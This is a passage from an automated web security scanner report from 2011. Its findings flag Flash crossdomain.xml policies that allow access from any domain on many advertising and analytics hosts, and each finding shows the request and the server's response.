<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.23. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 64028
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://gannett.gcion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.25. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2af5"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web205
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 21:19:57 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.26. http://i.w55c.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Mon, 16 May 2011 01:17:20 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 488

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

6.27. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 21:34:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 13-Aug-2011 21:34:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.28. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 15 May 2011 20:32:17 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.29. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 01:19:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.30. http://metrics.fingerhut.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.fingerhut.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.fingerhut.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:35 GMT
Server: Omniture DC/2.0.0
xserver: www28
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.31. http://metrics.mcafee.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:52 GMT
Server: Omniture DC/2.0.0
xserver: www68
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.32. http://metrics.sonystyle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sonystyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sonystyle.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:59 GMT
Server: Omniture DC/2.0.0
xserver: www201
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.33. http://metrics.us.playstation.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.us.playstation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.us.playstation.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:45 GMT
Server: Omniture DC/2.0.0
xserver: www339
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.34. http://nexus2.ensighten.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nexus2.ensighten.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nexus2.ensighten.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:20:09 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:42:59 GMT
ETag: "4b9cf-145-49793ce00fac0"
Accept-Ranges: bytes
Content-Length: 325
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...

6.35. http://p.brilig.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Mon, 16 May 2011 01:23:25 GMT
ETag: "3a149-ab-4a3053698f340"
Last-Modified: Wed, 11 May 2011 19:38:13 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
X-Brilig-D: D=84
Content-Length: 171
Connection: Close

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>


6.36. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 01:24:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.37. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Mon, 16 May 2011 01:29:35 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

6.38. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:19:50 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.39. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 15 May 2011 20:26:59 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 15 May 2011 20:26:59 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.40. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:30:58 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 22 May 2011 21:30:58 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.41. http://serv.adspeed.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serv.adspeed.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: serv.adspeed.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Thu, 27 May 2010 16:12:36 GMT
Content-Length: 357
Connection: close
Date: Mon, 16 May 2011 01:20:34 GMT
Server: AdSpeed/s12

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for AdSpeed Ad Server -->
<cross-domain-policy>
<site-control
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.42. http://sony.links.channelintelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 14:45:11 GMT
ETag: "80753121df22c81:320b"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 20:26:33 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

6.43. http://sony.links.origin.channelintelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.links.origin.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.links.origin.channelintelligence.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
Accept-Ranges: bytes
ETag: "eb20ee82e722c81:2dd2"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Sun, 15 May 2011 20:26:47 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

6.44. http://sony.tcliveus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.tcliveus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.tcliveus.com

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive
Content-Length: 79
Last-Modified: Sun, 15 May 2011 21:20:49 GMT
Content-Type: application/xml; charset=ISO-8859-1
Date: Sun, 15 May 2011 21:20:49 GMT
Set-Cookie: NSC_Tpo`=445b326b7863;expires=Mon, 16-May-11 01:20:49 GMT;path=/

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.45. http://sony.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sony.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sony.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Sun, 15 May 2011 21:19:59 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.46. http://sonycomputerentertai.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sonycomputerentertai.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sonycomputerentertai.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Sun, 15 May 2011 20:26:46 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.47. http://sync.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x220a 8714
Set-Cookie: ts=1305509186; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:26 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.48. http://t.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:26:58 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.49. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 01:26:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "c80001-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.50. http://ttwbs.channelintelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ttwbs.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ttwbs.channelintelligence.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 15 May 2011 20:26:57 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 441

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.51. http://turn.nexac.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://turn.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:26:47 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:26:46 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.52. http://usatoday1.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:53 GMT
Server: Omniture DC/2.0.0
xserver: www147
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.53. http://w88.go.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w88.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:27:17 GMT
Server: Omniture DC/2.0.0
xserver: www498
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.54. http://webtrends.telegraph.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webtrends.telegraph.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: webtrends.telegraph.co.uk

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8fb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:19:37 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://www.viddler.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viddler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.viddler.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sun, 15 May 2011 20:26:39 GMT
Content-Type: application/xml
Connection: close
X-Viddler-Node: viddler_d
Accept-Ranges: bytes
ETag: W/"80-1303891997000"
Last-Modified: Wed, 27 Apr 2011 08:13:17 GMT
Content-Length: 80

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

